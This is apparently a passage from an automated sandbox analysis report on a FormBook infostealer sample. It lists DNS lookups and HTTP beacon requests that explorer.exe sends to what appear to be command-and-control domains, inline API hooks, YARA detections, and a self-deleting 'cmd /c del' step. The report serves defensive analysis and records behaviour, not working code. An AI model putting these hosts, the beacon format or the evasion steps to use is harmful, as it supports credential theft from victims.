                                          Jul 4, 2024 16:34:46.417721987 CEST192.168.2.51.1.1.10xfd0fStandard query (0)www.cfuhtkwo.xyzA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:26.138349056 CEST192.168.2.51.1.1.10x71fbStandard query (0)www.cpuk-finance.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.824351072 CEST192.168.2.51.1.1.10x69d1Standard query (0)www.nearmeacupuncture.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:07.319444895 CEST192.168.2.51.1.1.10x9e8dStandard query (0)www.serco2020.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:27.933382034 CEST192.168.2.51.1.1.10xa6b8Standard query (0)www.mrwine.xyzA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:48.364486933 CEST192.168.2.51.1.1.10xf704Standard query (0)www.cioncarp4213.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.370213032 CEST192.168.2.51.1.1.10xf704Standard query (0)www.cioncarp4213.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:08.745883942 CEST192.168.2.51.1.1.10x6339Standard query (0)www.520yhy.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:29.183526039 CEST192.168.2.51.1.1.10x6150Standard query (0)www.byfchfyr.xyzA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:49.623927116 CEST192.168.2.51.1.1.10x744bStandard query (0)www.txglobedev.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:38:10.776838064 CEST192.168.2.51.1.1.10x147Standard query (0)www.whysco.comA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:38:31.464307070 CEST192.168.2.51.1.1.10x7fdeStandard query (0)www.jesuscrewofficial.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)www.yr8gl32.vipwinter.qnwoocaijo.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.173A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.177A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.178A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.174A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.199A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.200A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.175A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.176A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.198A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.172A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.204A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.207A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.201A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.197A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com216.83.55.171A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:26.169848919 CEST1.1.1.1192.168.2.50xf0bcNo error (0)winter.qnwoocaijo.com96.43.100.206A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:34:46.791239023 CEST1.1.1.1192.168.2.50xfd0fNo error (0)www.cfuhtkwo.xyz154.204.100.23A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:26.154699087 CEST1.1.1.1192.168.2.50x71fbNo error (0)www.cpuk-finance.com185.151.30.212A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.871419907 CEST1.1.1.1192.168.2.50x69d1No error (0)www.nearmeacupuncture.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.871419907 CEST1.1.1.1192.168.2.50x69d1No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.871419907 CEST1.1.1.1192.168.2.50x69d1No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.871419907 CEST1.1.1.1192.168.2.50x69d1No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:35:46.871419907 CEST1.1.1.1192.168.2.50x69d1No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:07.800064087 CEST1.1.1.1192.168.2.50x9e8dNo error (0)www.serco2020.com103.224.212.213A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:27.958539963 CEST1.1.1.1192.168.2.50xa6b8No error (0)www.mrwine.xyz3.64.163.50A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969120979 CEST1.1.1.1192.168.2.50xf704No error (0)www.cioncarp4213.com80717b6e07g.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969120979 CEST1.1.1.1192.168.2.50xf704No error (0)80717b6e07g.greycdn.net8cfc2069ey.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969120979 CEST1.1.1.1192.168.2.50xf704No error (0)8cfc2069ey.greycdn.net021562413z.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969120979 CEST1.1.1.1192.168.2.50xf704No error (0)021562413z.greycdn.net128.1.131.130A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969204903 CEST1.1.1.1192.168.2.50xf704No error (0)www.cioncarp4213.com80717b6e07g.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969204903 CEST1.1.1.1192.168.2.50xf704No error (0)80717b6e07g.greycdn.net8cfc2069ey.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969204903 CEST1.1.1.1192.168.2.50xf704No error (0)8cfc2069ey.greycdn.net021562413z.greycdn.netCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:36:49.969204903 CEST1.1.1.1192.168.2.50xf704No error (0)021562413z.greycdn.net128.1.131.130A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:09.143701077 CEST1.1.1.1192.168.2.50x6339No error (0)www.520yhy.com103.8.70.95A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:29.602471113 CEST1.1.1.1192.168.2.50x6150Name error (3)www.byfchfyr.xyznonenoneA (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:49.660924911 CEST1.1.1.1192.168.2.50x744bNo error (0)www.txglobedev.com188.114.97.3A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:37:49.660924911 CEST1.1.1.1192.168.2.50x744bNo error (0)www.txglobedev.com188.114.96.3A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:38:10.807018042 CEST1.1.1.1192.168.2.50x147No error (0)www.whysco.com91.195.240.123A (IP address)IN (0x0001)false
                                          Jul 4, 2024 16:38:31.654923916 CEST1.1.1.1192.168.2.50x7fdeNo error (0)www.jesuscrewofficial.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 4, 2024 16:38:31.654923916 CEST1.1.1.1192.168.2.50x7fdeNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.yr8gl32.vip
                                          • www.cfuhtkwo.xyz
                                          • www.cpuk-finance.com
                                          • www.nearmeacupuncture.com
                                          • www.serco2020.com
                                          • www.mrwine.xyz
                                          • www.cioncarp4213.com
                                          • www.520yhy.com
                                          • www.txglobedev.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549716216.83.55.173801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:34:26.175750017 CEST161OUTGET /dy13/?IR=PvB4rkoJuXXI3XrovRSl0ulB4esZJCnJeomMIIs8xluNKDV17gKdZx+EfyXB3rEjLuJx&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.yr8gl32.vip
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549717154.204.100.23801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:34:46.796763897 CEST162OUTGET /dy13/?IR=tpMAOJT8TtRMsuChjA4iw3MPbwbvajf92oh/j4Ngt5fu8FRpUZDvCuNqhi68G9U6kaV7&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cfuhtkwo.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549719185.151.30.212801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:35:26.166423082 CEST166OUTGET /dy13/?IR=gDxxMnsI36st3zAAJ1+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPEu2QspRuVgT&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cpuk-finance.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549720198.185.159.144801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:35:46.877455950 CEST171OUTGET /dy13/?IR=COXK5yT9Xx7VrCeWTqQC1HikmuY3GWnRD5VN4SaGvnHzB3wzqzXgI63okZhLDtLx1kx2&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.nearmeacupuncture.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549721103.224.212.213801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:36:07.818486929 CEST163OUTGET /dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.serco2020.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.5497223.64.163.50801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:36:27.968302011 CEST160OUTGET /dy13/?IR=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.mrwine.xyz
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549723128.1.131.130801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:36:49.977451086 CEST166OUTGET /dy13/?IR=VyXmaWdZl+jwWdNk+AMtKckYhqijILaYAxW34tQVDb7UqFANvgHXRuyONC1nPUdS4yTi&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.cioncarp4213.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549724103.8.70.95801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:37:09.149461031 CEST160OUTGET /dy13/?IR=I05FyvQRVtD1nBL3W879G3rrifn+JaBOl79MbsgbL3I2Ix0E6XOmXaYbAYxT8R6qOP2I&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.520yhy.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549725188.114.97.3801028C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:37:49.666945934 CEST164OUTGET /dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR HTTP/1.1
                                          Host: www.txglobedev.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 4, 2024 16:37:50.162930012 CEST1236INHTTP/1.1 403 Forbidden
                                          Date: Thu, 04 Jul 2024 14:37:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Frame-Options: SAMEORIGIN
                                          Referrer-Policy: same-origin
                                          Cache-Control: max-age=15
                                          Expires: Thu, 04 Jul 2024 14:38:05 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mPPvCPX69pcdROM7u5%2Fb0bkGZQlDADfUQbXkdcE%2B9yRj5Rme31K%2BqG8CruhJjR01jp2lTKm2BQRrLfTCFh9d9SpTsGuufrQ21vYbB%2BBW9ZrQtWG%2FAZ0n9g9t0wUrGPOPNULt1c%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 89dfdb042ff043bc-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 [TRUNCATED]
                                          Data Ascii: 11a3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots"
                                          Jul 4, 2024 16:37:50.162942886 CEST1236INData Raw: 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69
                                          Data Ascii: content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css
                                          Jul 4, 2024 16:37:50.162957907 CEST448INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                          Data Ascii: <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-sectio
                                          Jul 4, 2024 16:37:50.162967920 CEST1236INData Raw: 63 6b 65 64 5f 77 68 79 5f 64 65 74 61 69 6c 22 3e 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 75 73 69 6e 67 20 61 20 73 65 63 75 72 69 74 79 20 73 65 72 76 69 63 65 20 74 6f 20 70 72 6f 74 65 63 74 20 69 74 73 65 6c 66 20 66 72 6f 6d 20 6f
                                          Data Ascii: cked_why_detail">This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a cert
                                          Jul 4, 2024 16:37:50.162980080 CEST1061INData Raw: 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63
                                          Data Ascii: button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.33</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span>


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:10:33:49
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0x910000
                                          File size:621'056 bytes
                                          MD5 hash:A9C37F81CD9A181DAB2262D2F8456A76
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2001523067.000000000467E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:10:33:51
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0xef0000
                                          File size:621'056 bytes
                                          MD5 hash:A9C37F81CD9A181DAB2262D2F8456A76
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:10:33:51
                                          Start date:04/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff674740000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:5
                                          Start time:10:33:52
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\wlanext.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\wlanext.exe"
                                          Imagebase:0xfe0000
                                          File size:78'336 bytes
                                          MD5 hash:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449543692.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4449465377.0000000003040000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:6
                                          Start time:10:33:56
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
                                          Imagebase:0x790000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:7
                                          Start time:10:33:56
                                          Start date:04/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.2%
                                            Total number of Nodes:405
                                            Total number of Limit Nodes:27
